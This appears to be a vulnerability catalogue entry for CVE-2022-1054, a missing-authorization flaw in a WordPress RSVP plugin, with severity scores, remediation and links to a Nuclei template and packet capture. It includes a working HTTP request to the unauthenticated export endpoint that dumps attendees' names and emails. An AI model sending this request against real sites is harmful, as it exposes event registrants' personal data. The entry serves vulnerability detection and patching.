| Title | WordPress RSVP and Event Management <2.7.8 - Missing Authorization |
|---|---|
| Author | Akincibor |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to perform unauthorized actions, such as creating, modifying, or deleting events. |
| Remediation | Update the WordPress RSVP and Event Management plugin to version 2.7.8 or later. |
| CVSS Score | 5.3 |
| EPSS Score | 0.12369 |
| CVE ID | CVE-2022-1054 |
| CWE ID | CWE-862 |
| Tags | cve cve2022 wordpress wpscan wp wp-plugin wpchill vuln |
WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events,
GET /wp-admin/admin.php?page=rsvp-admin-export HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1054.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-1054.pcap
N/AN/A